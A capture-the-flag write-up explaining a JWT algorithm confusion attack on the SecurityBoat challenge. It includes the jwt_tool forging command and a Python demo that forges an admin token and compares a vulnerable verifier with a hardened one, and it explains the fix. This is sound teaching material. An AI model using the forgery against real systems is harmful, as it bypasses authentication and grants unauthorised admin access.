SecurityBoat posted the following CTF challenge on their Twitter account.
The challenge was to get to the admin dashboard and retrieve the flag. Initial credentials were provided on the login screen.
Upon logging in, we see two cookies being returned from the server: auth and pubkey.
The auth cookie is clearly a JWT, so we can use a tool like jwt.io to inspect its contents.
Notably, the token is signed with RS256 (asymmetric RSA signature, verified with a public key) and carries a role field within its payload.
Upon logging in, we are redirected to http://ctf.securityboat.in:4000/jwt/user/home.php.
With all that said, our likely attack methodology is the following:
- Replace the user value with admin within the role field of the token
- Find a way to sign the token
- Using the token, navigate to http://ctf.securityboat.in:4000/jwt/admin/home.php
Since we know the public key used for the RS256 signature (the server hands it to us in the pubkey cookie), we can attempt an algorithm confusion attack. This attack takes advantage of a backend that trusts the alg field in the token header and picks the verification routine from it: if we change alg to HS256, the server treats the RSA public key it already holds as an HMAC secret, and because that public key is public, we can compute exactly the same HMAC ourselves. We can use jwt.io to modify the necessary fields (role and alg) and sign the token with JWT_Tool.
The command to do so looks like the following:
python3 jwt_tool.py INSERT_MODIFIED_TOKEN_HERE -S hs256 -k public_key.pem
where public_key.pem is the file that contains the RSA public key returned from the server in the pubkey cookie during initial login (make sure to URL-decode the cookie value before saving it; the HMAC is computed over the exact bytes the server loads, so the PEM must match byte for byte, including line breaks).
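To make the confusion concrete, here is an added example (not part of the original write-up, and not the challenge's code) that builds the forged token the way jwt_tool does and runs it against a vulnerable verifier that dispatches on the header's alg, next to a hardened one that pins RS256. It uses only the standard library; the RSA key pair, the PEM encoding of the public key and the user token are all constructed inside the block as stand-ins for what the real server would issue (the PEM body here is a simplified n||e layout, not real SubjectPublicKeyInfo DER, since only the exact bytes the server loads matter for the attack).

```python
import base64
import hashlib
import hmac
import json
import random

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

# ---- minimal RSA / RS256, standing in for the server's real key (constructed for the demo) ----
def is_probable_prime(n: int, rounds: int = 16) -> bool:
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):                      # Miller-Rabin
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits: int) -> int:
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand

def gen_keypair(bits: int = 1024):
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:                   # e is prime, so this is gcd(e, phi) == 1
            return (p * q, e), (p * q, pow(e, -1, phi))

SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

def pkcs1_v15_encode(msg: bytes, k: int) -> bytes:  # EMSA-PKCS1-v1_5 with SHA-256
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def rs256_sign(msg: bytes, priv) -> bytes:
    n, d = priv
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(pkcs1_v15_encode(msg, k), "big"), d, n).to_bytes(k, "big")

def rs256_verify(msg: bytes, sig: bytes, pub) -> bool:
    n, e = pub
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    return hmac.compare_digest(em, pkcs1_v15_encode(msg, k))

def public_key_pem(pub) -> bytes:
    """Constructed PEM stand-in for the pubkey cookie: base64(n || e) between PEM armour."""
    n, e = pub
    body = base64.b64encode(n.to_bytes((n.bit_length() + 7) // 8, "big") + e.to_bytes(4, "big")).decode()
    lines = [body[i:i + 64] for i in range(0, len(body), 64)]
    return ("-----BEGIN PUBLIC KEY-----\n" + "\n".join(lines) + "\n-----END PUBLIC KEY-----\n").encode()

def parse_public_key_pem(pem: bytes):
    raw = base64.b64decode(b"".join(l for l in pem.splitlines() if not l.startswith(b"-----")))
    return int.from_bytes(raw[:-4], "big"), int.from_bytes(raw[-4:], "big")

# ---- JWT handling ----
def hs256_sign(msg: bytes, key: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()

def jwt_encode(header: dict, payload: dict, signer) -> str:
    enc = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{enc(header)}.{enc(payload)}"
    return f"{signing_input}.{b64url(signer(signing_input.encode()))}"

def jwt_split(token: str):
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), f"{h}.{p}".encode(), b64url_decode(s)

def verify_vulnerable(token: str, key_pem: bytes) -> dict:
    """Trusts header.alg and hands the same key material to whichever routine it names."""
    header, payload, signing_input, sig = jwt_split(token)
    if header.get("alg") == "RS256":
        ok = rs256_verify(signing_input, sig, parse_public_key_pem(key_pem))
    elif header.get("alg") == "HS256":
        ok = hmac.compare_digest(sig, hs256_sign(signing_input, key_pem))  # public PEM bytes as HMAC secret
    else:
        ok = False
    if not ok:
        raise ValueError("bad signature")
    return payload

def verify_hardened(token: str, key_pem: bytes) -> dict:
    """Algorithm is fixed server-side: anything but an RSA-valid RS256 token is rejected."""
    header, payload, signing_input, sig = jwt_split(token)
    if header.get("alg") != "RS256" or not rs256_verify(signing_input, sig, parse_public_key_pem(key_pem)):
        raise ValueError("bad signature")
    return payload

def forge_admin_token(user_token: str, key_pem: bytes) -> str:
    """The role/alg edits plus `-S hs256 -k public_key.pem`, done by hand."""
    header, payload, _, _ = jwt_split(user_token)
    header["alg"] = "HS256"
    payload["role"] = "admin"
    return jwt_encode(header, payload, lambda m: hs256_sign(m, key_pem))

def demo() -> dict:
    random.seed(1)                               # deterministic key pair for the demo
    pub, priv = gen_keypair(1024)
    pem = public_key_pem(pub)
    user_token = jwt_encode({"alg": "RS256", "typ": "JWT"}, {"user": "ctfuser", "role": "user"},
                            lambda m: rs256_sign(m, priv))
    forged = forge_admin_token(user_token, pem)
    result = {"forged_alg": jwt_split(forged)[0]["alg"],
              "vulnerable_role": verify_vulnerable(forged, pem)["role"],
              "original_role": verify_hardened(user_token, pem)["role"]}
    try:
        verify_hardened(forged, pem)
        result["hardened_accepts_forgery"] = True
    except ValueError:
        result["hardened_accepts_forgery"] = False
    return result

if __name__ == "__main__":
    print(demo())
```

The only difference between the two verifiers is whether the header decides the algorithm. Real libraries close this hole by making the caller pass an explicit allow-list (PyJWT's algorithms=["RS256"], for instance) and by refusing to use PEM-shaped bytes as an HMAC secret; the fix on the server side is to pin the algorithm and key type, never to hide the public key.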
After JWT_Tool returns the tampered token, we can use Chrome DevTools (Application > Cookies) to replace the value of the auth cookie within the current session.
After navigating to http://ctf.securityboat.in:4000/jwt/admin/user.php, we get the flag.